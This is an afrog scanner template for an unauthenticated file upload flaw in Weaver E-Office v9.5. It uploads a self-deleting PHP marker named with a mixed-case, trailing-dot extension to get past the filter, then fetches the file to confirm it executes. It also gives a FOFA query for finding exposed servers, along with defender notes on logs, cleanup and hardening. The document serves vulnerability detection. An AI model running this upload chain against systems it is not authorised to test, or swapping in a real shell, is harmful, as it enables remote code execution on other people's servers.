漏洞描述
Weaver E-Office v9.5 file upload vulnerability. Official website: https://www.e-office.cn/
FOFA: app="泛微-EOffice"
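# Detection template for the unrestricted file upload in Weaver (泛微) E-Office
# v9.5, reached through the mobile_upload_save action of
# /E-mobile/App/Ajax/ajax.php. The layout (set / rules / expression) appears
# to be the afrog PoC rule format.
#
# What a match means: the server accepted an upload whose name carries a
# PHP-like extension, stored it under the web-served /attachment/ tree, and
# executed it when it was requested. The upload request below carries no
# cookie or credential header, so a match also shows the endpoint answered
# without a session.
#
# Notes for defenders:
# - Log signature: a multipart POST to the path in r0, followed by a GET under
#   /attachment/<10 digits>/ for a script-like file name.
# - Cleanup: the probe file removes itself only when r1 actually executes it.
#   If r0 matches and r1 does not, the file is still on disk and should be
#   removed from the attachment directory by hand.
# - Hardening: apply the vendor fix, restrict access to the endpoint until
#   then, and make sure nothing under the attachment directory is handed to
#   the PHP interpreter. Upload filters should normalise case and strip
#   trailing dots before comparing extensions.
id: eoffice-v9-mobile-upload-save-fileupload

info:
  name: 泛微 E-Office v9.5 mobile_upload_save 任意文件上传漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |
    weaver E-Office v9.5 file upload vulnerability official website:https://www.e-office.cn/
    FOFA: app="泛微-EOffice"
  reference:
    - https://github.com/sunyixuan1228/cve/blob/main/weaver.md?ref=www.ctfiot.com
    - https://www.ctfiot.com/116750.html
  tags: eoffice,ecology,fileupload
  created: 2023/07/11

set:
  # Random marker printed by the probe file; a fresh value per run means a
  # cached or unrelated page cannot satisfy r1.
  randbody: randomLowercase(32)
  # Random suffix for the multipart boundary.
  rboundary: randomLowercase(8)

rules:
  # r0: upload step. The file name ends in ".phP." (mixed case plus trailing
  # dot) while the part is declared as image/jpeg.
  r0:
    request:
      method: POST
      path: /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      # The body is a double-quoted scalar with escaped line breaks so that
      # every part is terminated by an exact CRLF; do not reflow it.
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"upload_quwan\";filename=\"uploadsavex.phP.\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        <?php echo \"{{randbody}}\";unlink(__FILE__);?>\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"file\"; filename=\"\"\r\n\
        Content-Type: application/octet-stream\r\n\
        \r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    # The upload counts as accepted when the response echoes the submitted
    # file name, including the trailing dot.
    expression: response.status == 200 && response.body.bcontains(b'"uploadsavex.phP."')
    output:
      # Capture the 10-digit value returned just before the file name; r1 uses
      # it as the directory under /attachment/ (presumably a Unix timestamp,
      # not confirmed by this page).
      search: '"\",(?P<filename>[0-9]{10}),\"uploadsavex.phP".bsubmatch(response.body)'
      filename: search["filename"]
  # r1: confirmation step. The name is requested without the trailing dot, so
  # the template relies on the dot being dropped when the file is stored.
  r1:
    request:
      method: GET
      path: /attachment/{{filename}}/uploadsavex.phP
    # The marker alone is not proof of execution: a server that returns the
    # file as static text would also send the marker, inside the raw PHP
    # source. Requiring that the "<?php" opener is absent limits the match to
    # responses produced by the interpreter.
    expression: response.status == 200 && response.body.bcontains(bytes(randbody)) && !response.body.bcontains(b'<?php')

# Report only when the upload was accepted and the stored file was executed.
expression: r0() && r1()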